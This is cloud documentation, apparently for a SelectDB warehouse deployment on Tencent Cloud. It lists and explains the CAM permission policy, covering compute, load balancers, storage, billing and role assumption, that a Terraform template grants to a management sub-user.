The first run of the Terraform template creates a sub-user that is used afterwards to manage the warehouse components inside your VPC. Its permissions are described below.
Note: the sub-user belongs to your cloud account and is used only inside your VPC; it is not exposed outside your account.
{
"version": "2.0",
"statement": [
{
"action": [
"cvm:DescribeInstances",
"cvm:DescribeInstanceAttributes",
"cvm:InquiryPriceRunInstances",
"cvm:RunInstances",
"cvm:StartInstances",
"cvm:StopInstances",
"cvm:PurgeInstances",
"cvm:RebootInstances",
"cvm:TerminateInstances",
"cvm:RenewInstances",
"cvm:ViewModifyInstancesAttribute",
"cvm:ModifyInstancesAttribute",
"cvm:ModifyInstancesChargeType",
"cvm:ResetInstancesType",
"cvm:AssociateInstancesKeyPairs",
"cvm:DisassociateInstancesKeyPairs",
"cvm:DeleteKeyPairs",
"cvm:DescribeSecurityGroups",
"cvm:CreateSecurityGroup",
"cvm:CreateSecurityGroupPolicy",
"cvm:ModifySecurityGroupAttributes",
"cvm:ModifySingleSecurityGroupPolicy",
"cvm:ModifySecurityGroupPolicys",
"cvm:AssociateSecurityGroups",
"cvm:DisassociateSecurityGroups",
"cvm:DeleteSecurityGroup",
"cvm:DeleteSecurityGroupPolicy",
"cvm:CreateCbsStorages",
"cvm:AttachCbsStorages",
"cvm:DetachCbsStorages",
"cvm:ResizeCbsStorage",
"cvm:ModifyCbsStorageAttributes",
"cvm:DescribeDisks",
"cvm:CreateDisks",
"cvm:AttachDisks",
"cvm:DetachDisks",
"cvm:RenewDisk",
"cvm:ResizeDisk",
"cvm:ModifyDiskAttributes",
"vpc:DescribeVpcEx",
"vpc:DescribeSubnet",
"vpc:DescribeSubnetEx",
"vpc:ModifyVpcEndPointAttribute",
"clb:DescribeLoadBalancers",
"clb:DescribeLoadBalancersDetail",
"clb:InquiryPriceCreateLoadBalancer",
"clb:InquiryPriceRefundLoadBalancer",
"clb:InquiryPriceRenewLoadBalancer",
"clb:CreateLoadBalancer",
"clb:DeleteLoadBalancer",
"clb:DeleteLoadBalancers",
"clb:DescribeListeners",
"clb:DescribeLBListeners",
"clb:DescribeLoadBalancerListeners",
"clb:CreateListener",
"clb:CreateLoadBalancerListeners",
"clb:SetLoadBalancerStartStatus",
"clb:DeleteListener",
"clb:DeleteLoadBalancerListeners",
"clb:DescribeTargets",
"clb:DescribeTargetGroups",
"clb:DescribeTargetGroupList",
"clb:DescribeTargetGroupInstances",
"clb:CreateTargetGroup",
"clb:ModifyTargetGroupAttribute",
"clb:DeleteTargetGroups",
"clb:RegisterTargets",
"clb:DeregisterTargets",
"clb:BatchRegisterTargets",
"clb:BatchDeregisterTargets",
"clb:RegisterTargetGroupInstances",
"clb:AssociateTargetGroups",
"clb:DisassociateTargetGroups",
"clb:RegisterInstancesWithLoadBalancer",
"clb:DeregisterTargetGroupInstances",
"clb:DeregisterInstancesFromLoadBalancer",
"clb:CreateRule",
"clb:CreateListenerRules",
"clb:ModifyRule",
"clb:DeleteRule",
"clb:SetSecurityGroups",
"clb:SetSecurityGroupForLoadbalancers",
"clb:SetLoadBalancerSecurityGroups"
],
"effect": "allow",
"resource": [
"*"
]
},
{
"action": [
"tat:RunCommand",
"tat:DescribeInvocations",
"tat:DescribeInvocationTasks"
],
"effect": "allow",
"resource": [
"*"
]
},
{
"action": [
"finance:*"
],
"effect": "allow",
"resource": [
"qcs::cvm:::*",
"qcs::clb:::*"
]
},
{
"action": [
"cos:*"
],
"effect": "allow",
"resource": [
"qcs::cos:ap-beijing:uid/${local.appID}:${tencentcloud_cos_bucket.SelectDBBucket.id}",
"qcs::cos:ap-beijing:uid/${local.appID}:${tencentcloud_cos_bucket.SelectDBBucket.id}/*"
]
},
{
"action": [
"name/sts:AssumeRole"
],
"effect": "allow",
"resource": [
"qcs::cam::uin/${data.tencentcloud_user_info.SelectDBUserAccount.owner_uin}:roleName/${tencentcloud_cam_role.SelectDBRole.name}"
]
}
]
}
The permissions break down as follows:
- Cloud Virtual Machine (CVM) permissions:
  - Manage CVM instances and CBS disks:
    "cvm:DescribeInstances", "cvm:DescribeInstanceAttributes", "cvm:InquiryPriceRunInstances", "cvm:RunInstances", "cvm:StartInstances", "cvm:StopInstances", "cvm:PurgeInstances", "cvm:RebootInstances", "cvm:TerminateInstances", "cvm:RenewInstances", "cvm:ViewModifyInstancesAttribute", "cvm:ModifyInstancesAttribute", "cvm:ModifyInstancesChargeType", "cvm:ResetInstancesType", "cvm:CreateCbsStorages", "cvm:AttachCbsStorages", "cvm:DetachCbsStorages", "cvm:ResizeCbsStorage", "cvm:ModifyCbsStorageAttributes", "cvm:DescribeDisks", "cvm:CreateDisks", "cvm:AttachDisks", "cvm:DetachDisks", "cvm:RenewDisk", "cvm:ResizeDisk", "cvm:ModifyDiskAttributes",
  - Manage CVM security groups:
    "cvm:DescribeSecurityGroups", "cvm:CreateSecurityGroup", "cvm:CreateSecurityGroupPolicy", "cvm:ModifySecurityGroupAttributes", "cvm:ModifySingleSecurityGroupPolicy", "cvm:ModifySecurityGroupPolicys", "cvm:AssociateSecurityGroups", "cvm:DisassociateSecurityGroups", "cvm:DeleteSecurityGroup", "cvm:DeleteSecurityGroupPolicy",
  - Manage CVM SSH key pairs:
    "cvm:AssociateInstancesKeyPairs", "cvm:DisassociateInstancesKeyPairs", "cvm:DeleteKeyPairs",
  - Run TencentCloud Automation Tools (TAT) commands on CVM:
    "tat:RunCommand", "tat:DescribeInvocations", "tat:DescribeInvocationTasks"
- Virtual Private Cloud (VPC) and CLB permissions:
  - Read VPC resource information and modify VPC endpoint attributes:
    "vpc:DescribeVpcEx", "vpc:DescribeSubnet", "vpc:DescribeSubnetEx", "vpc:ModifyVpcEndPointAttribute",
  - Manage Cloud Load Balancer (CLB) resources:
    "clb:DescribeLoadBalancers", "clb:DescribeLoadBalancersDetail", "clb:InquiryPriceCreateLoadBalancer", "clb:InquiryPriceRefundLoadBalancer", "clb:InquiryPriceRenewLoadBalancer", "clb:CreateLoadBalancer", "clb:DeleteLoadBalancer", "clb:DeleteLoadBalancers", "clb:DescribeListeners", "clb:DescribeLBListeners", "clb:DescribeLoadBalancerListeners", "clb:CreateListener", "clb:CreateLoadBalancerListeners", "clb:SetLoadBalancerStartStatus", "clb:DeleteListener", "clb:DeleteLoadBalancerListeners", "clb:DescribeTargets", "clb:DescribeTargetGroups", "clb:DescribeTargetGroupList", "clb:DescribeTargetGroupInstances", "clb:CreateTargetGroup", "clb:ModifyTargetGroupAttribute", "clb:DeleteTargetGroups", "clb:RegisterTargets", "clb:DeregisterTargets", "clb:BatchRegisterTargets", "clb:BatchDeregisterTargets", "clb:RegisterTargetGroupInstances", "clb:AssociateTargetGroups", "clb:DisassociateTargetGroups", "clb:RegisterInstancesWithLoadBalancer", "clb:DeregisterTargetGroupInstances", "clb:DeregisterInstancesFromLoadBalancer", "clb:CreateRule", "clb:CreateListenerRules", "clb:ModifyRule", "clb:DeleteRule", "clb:SetSecurityGroups", "clb:SetSecurityGroupForLoadbalancers", "clb:SetLoadBalancerSecurityGroups"
- Finance permissions:
  - Allow purchasing CVM and CLB resources:
    { "action": [ "finance:*" ], "effect": "allow", "resource": [ "qcs::cvm:::*", "qcs::clb:::*" ] },
- Cloud Object Storage (COS) permissions:
  - Manage the COS bucket the template creates and read and write its contents (resource-scoped to that one bucket):
    { "action": [ "cos:*" ], "effect": "allow", "resource": [ "qcs::cos:ap-beijing:uid/${local.appID}:${tencentcloud_cos_bucket.SelectDBBucket.id}", "qcs::cos:ap-beijing:uid/${local.appID}:${tencentcloud_cos_bucket.SelectDBBucket.id}/*" ] },
- Cloud Access Management (CAM) permissions:
  - Allow assuming one specific role. Because the sub-user can assume SelectDBRole, its effective privileges include whatever policies are attached to that role, so review the role's attached policies and its trust (assume-role) policy as part of the same audit:
    { "action": [ "name/sts:AssumeRole" ], "effect": "allow", "resource": [ "qcs::cam::uin/${data.tencentcloud_user_info.SelectDBUserAccount.owner_uin}:roleName/${tencentcloud_cam_role.SelectDBRole.name}" ] }